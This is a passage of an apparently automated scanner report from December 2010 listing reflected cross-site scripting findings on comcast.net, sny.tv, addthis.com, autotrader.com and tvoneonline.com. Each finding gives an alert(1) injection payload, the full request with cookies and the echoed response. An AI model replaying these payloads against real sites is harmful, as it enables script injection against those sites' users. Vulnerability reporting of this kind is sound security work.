2.117. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70249"><img%20src%3da%20onerror%3dalert(1)>74ca705f798 was submitted in the REST URL parameter 9. This input was echoed as 70249"><img src=a onerror=alert(1)>74ca705f798 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x3270249"><img%20src%3da%20onerror%3dalert(1)>74ca705f798/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1495
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/190952221/x3270249"><img src=a onerror=alert(1)>74ca705f798/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.118. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a1e9"><script>alert(1)</script>5881f5fc9eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?9a1e9"><script>alert(1)</script>5881f5fc9eb=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1404
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1157883388/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&9a1e9"><script>alert(1)</script>5881f5fc9eb=1" WIDTH=2 HEIGHT=2>

2.119. http://oascentral.comcast.net/RealMedia/ads/adstream_sx.cgi/comcast.net/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_sx.cgi/comcast.net/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf35b"><script>alert(1)</script>49f7dfd6bf9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.cgi/comcast.netbf35b"><script>alert(1)</script>49f7dfd6bf9/ HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:14:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 356
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/comcast.netbf35b"><script>alert(1)</script>49f7dfd6bf9/1920876736/UNKNOWN/default/empty.gif/726e6e65456b7a75345934414371526a;zip=US:77002?x" target="_top">
...[SNIP]...

2.120. http://oascentral.comcast.net/RealMedia/ads/adstream_sx.cgi/comcast.net/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_sx.cgi/comcast.net/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e31"><script>alert(1)</script>df1925c3675 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.cgi/comcast.net/?62e31"><script>alert(1)</script>df1925c3675=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:14:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 483
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/comcast.net/L11/1196251715/UNKNOWN/Comcast/BPGLMA_201012_SPTS_300_HOU/300x250_Sierra.gif/726e6e65456b7a75345934414371526a;zip=US:77002
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/L11/1196251715/UNKNOWN/Comcast/BPGLMA_201012_SPTS_300_HOU/300x250_Sierra.gif/726e6e65456b7a75345934414371526a?62e31"><script>alert(1)</script>df1925c3675=1" ALT="" BORDER="0">
...[SNIP]...

2.121. http://signup.comcast.net/identity/reg [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://signup.comcast.net
Path:   /identity/reg

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b994"><script>alert(1)</script>006d67d6e6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /identity/reg?4b994"><script>alert(1)</script>006d67d6e6e=1 HTTP/1.1
Host: signup.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:09:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.7
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: PlaxoLang=en; path=/; domain=.account.comcast.net
Set-Cookie: PlaxoCS=1624913714130882655; path=/; domain=.account.comcast.net
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14040

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7">
<meta http-equiv="Content-Type" content="text/html; charset=utf-
...[SNIP]...
<form method="POST" action="https://signup.comcast.net/identity/reg?4b994"><script>alert(1)</script>006d67d6e6e=1" onsubmit="return validateSignup(this);" name="signupForm">
...[SNIP]...

2.122. http://tvoneonline.com/video/b_player.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tvoneonline.com
Path:   /video/b_player.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dede"><script>alert(1)</script>a693329120d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/b_player.php?9dede"><script>alert(1)</script>a693329120d=1 HTTP/1.1
Host: tvoneonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>A Different World, Lincoln Heights, Love That Girl, Way Bl
...[SNIP]...
<form id="tnt_comments_submit_form" method="post" action="/video/b_player.php?9dede"><script>alert(1)</script>a693329120d=1#comments_anchor" onsubmit="rememberfields()" style="display:none;">
...[SNIP]...

2.123. http://web.sny.tv/fan_zone/messageboard/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sny.tv
Path:   /fan_zone/messageboard/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload fa0fc</script><script>alert(1)</script>644720c7edd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fan_zone/messageboard/?fa0fc</script><script>alert(1)</script>644720c7edd=1 HTTP/1.1
Host: web.sny.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Host: ct04-dc2
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 19 Dec 2010 18:30:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34231


                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   
   <title>Home | SNY.t
...[SNIP]...
section = "fan_zone";
   var ctxPath = "";
   var pageid = "index";
   var dc_keyVal = "";
   // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/fan_zone/messageboard/']
   // requestQuery: fa0fc</script><script>alert(1)</script>644720c7edd=1        
   </script>
...[SNIP]...

2.124. http://web.sny.tv/media/video.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sny.tv
Path:   /media/video.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload 40697</script><script>alert(1)</script>e05f1431920 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /media/video.jsp?40697</script><script>alert(1)</script>e05f1431920=1 HTTP/1.1
Host: web.sny.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Host: t01-dc2
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=7188
Expires: Sun, 19 Dec 2010 20:31:30 GMT
Date: Sun, 19 Dec 2010 18:31:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 75019


                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html
...[SNIP]...
   var section = "video";
   var ctxPath = "";
   var pageid = "topic_video";
   var dc_keyVal = "";
   // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/media/video.jsp']
   // requestQuery: 40697</script><script>alert(1)</script>e05f1431920=1        
   </script>
...[SNIP]...

2.125. http://web.sny.tv/news/archive.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sny.tv
Path:   /news/archive.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload ceb7c</script><script>alert(1)</script>8fba1b30fa7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/archive.jsp?ceb7c</script><script>alert(1)</script>8fba1b30fa7=1 HTTP/1.1
Host: web.sny.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Host: ct03-dc2
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=7200
Expires: Sun, 19 Dec 2010 20:30:26 GMT
Date: Sun, 19 Dec 2010 18:30:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42868


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   
   <title>SNY.tv: News<
...[SNIP]...
t">
   var section = "news";
   var ctxPath = "";
   var pageid = "archive";
   var dc_keyVal = "";
   // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/news/archive.jsp']
   // requestQuery: ceb7c</script><script>alert(1)</script>8fba1b30fa7=1        
   </script>
...[SNIP]...

2.126. http://web.sny.tv/news/columnist.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sny.tv
Path:   /news/columnist.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload 83b42</script><script>alert(1)</script>76f090a1843 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/columnist.jsp?83b42</script><script>alert(1)</script>76f090a1843=1 HTTP/1.1
Host: web.sny.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Host: ct03-dc2
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=7200
Expires: Sun, 19 Dec 2010 20:30:24 GMT
Date: Sun, 19 Dec 2010 18:30:24 GMT
Content-Length: 30481
Connection: close


                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   
   <title>SNY Columnis
...[SNIP]...
   var section = "news";
   var ctxPath = "";
   var pageid = "columnist";
   var dc_keyVal = "";
   // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/news/columnist.jsp']
   // requestQuery: 83b42</script><script>alert(1)</script>76f090a1843=1        
   </script>
...[SNIP]...

2.127. http://web.sny.tv/search/media.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sny.tv
Path:   /search/media.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload d5034</script><script>alert(1)</script>e5e8c9bf78b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/media.jsp?d5034</script><script>alert(1)</script>e5e8c9bf78b=1 HTTP/1.1
Host: web.sny.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; puidn=4555162161292783253924; s_sq=%5B%5BB%5D%5D; __qca=P0-1932474003-1292783253581;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Host: ct01-dc2
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=7200
Expires: Sun, 19 Dec 2010 20:30:24 GMT
Date: Sun, 19 Dec 2010 18:30:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33552


                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   
   <title>SN
...[SNIP]...
pt">
   var section = "media";
   var ctxPath = "";
   var pageid = "index";
   var dc_keyVal = "";
   // KeyValXpath: //ads/provider[@name='doubleclick']/prop[@uri='/search/media.jsp']
   // requestQuery: d5034</script><script>alert(1)</script>e5e8c9bf78b=1        
   </script>
...[SNIP]...

2.128. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3462"-alert(1)-"d0eff2b1478 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.phpa3462"-alert(1)-"d0eff2b1478 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 19 Dec 2010 18:30:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=cjihrpeovelp8v558shmush177; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.phpa3462"-alert(1)-"d0eff2b1478";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.129. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 866d9<script>alert(1)</script>f5c221fed4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php866d9<script>alert(1)</script>f5c221fed4c HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 19 Dec 2010 18:30:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=n3ai0ab6isuvt5o8svci4rtgi2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php866d9<script>alert(1)</script>f5c221fed4c</strong>
...[SNIP]...

2.130. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e40a5"-alert(1)-"c1edf7a2e70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/e40a5"-alert(1)-"c1edf7a2e70 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:30:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 91760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/e40a5"-alert(1)-"c1edf7a2e70";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.131. http://www.autotrader.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19533"%3balert(1)//bdc50d644ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19533";alert(1)//bdc50d644ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?19533"%3balert(1)//bdc50d644ac=1 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:30:29 GMT
Server: Apache
Set-Cookie: v1st=B6DE3D485BDE3E45; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
